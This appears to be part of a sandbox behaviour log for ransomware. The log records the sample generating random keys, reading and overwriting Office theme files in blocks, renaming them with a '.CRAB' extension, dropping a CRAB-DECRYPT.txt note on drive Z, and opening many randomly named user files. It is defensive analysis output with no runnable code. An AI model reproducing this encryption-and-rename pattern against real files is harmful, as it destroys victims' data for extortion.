| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 1048576, size_out = 121791 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 121792 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 1048576, size_out = 702219 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 702224 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx, type = file_attributes |
|
1 | |
|
For performance reasons, the remaining 988 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0x618
542
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = Z:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = Z:\ggNuzUYFd.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\ggNuzUYFd.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\QbYwYSoMD3beKw.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\QbYwYSoMD3beKw.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\fUHonlL.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\fUHonlL.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\brgVKnP3IVGPPX.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\brgVKnP3IVGPPX.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\PCEJlbmpwZ68QNsWdvWo.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\PCEJlbmpwZ68QNsWdvWo.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\zP0nKisr4oLuznV8Y.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\zP0nKisr4oLuznV8Y.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\DR2HdhXM7A.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\DR2HdhXM7A.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\0uoW8iDiO9C0q.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\0uoW8iDiO9C0q.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ctwtFUQdhyq9B0.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\ctwtFUQdhyq9B0.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\wwWTiMqjx6hY7AqmcQRC.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\wwWTiMqjx6hY7AqmcQRC.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZluEZ8VfU.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\ZluEZ8VfU.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\AeKHMJrNCDYUq.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\AeKHMJrNCDYUq.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\usc0a0c3QarsfV.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\usc0a0c3QarsfV.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Ft1MOn1CIc.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\Ft1MOn1CIc.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1taL0c72JXkGj.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\1taL0c72JXkGj.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EmullYJgNTq8y.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\EmullYJgNTq8y.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\fJJNxlZPFcIOL7N8L.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\fJJNxlZPFcIOL7N8L.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\hjOwYAb7YQ2odlEyn.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\hjOwYAb7YQ2odlEyn.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZcRis.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\ZcRis.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pEtobMGPdVk4C2adw.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\pEtobMGPdVk4C2adw.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sEi0K8sZnqEl5.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\sEi0K8sZnqEl5.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\oXr639hN3x86Bhd.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\oXr639hN3x86Bhd.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\XmnJxoBkEp9WD4cyN.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\XmnJxoBkEp9WD4cyN.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\KtzEQVEZQWFLdAY3Qn.odt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\KtzEQVEZQWFLdAY3Qn.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sbZAE.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\sbZAE.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ukO9D2qllnBsxnQ.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\ukO9D2qllnBsxnQ.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\UsVrBfwU9tuC5KFqX2K.swf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\UsVrBfwU9tuC5KFqX2K.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\gr07JV38A.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\gr07JV38A.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\BhX74jJaOIdhyhcSe5G9.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\BhX74jJaOIdhyhcSe5G9.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\xQ6SLR9y03J4ITfu7P.flv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\xQ6SLR9y03J4ITfu7P.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\4z3uag.rtf, type = file_attributes |
|
1 | |
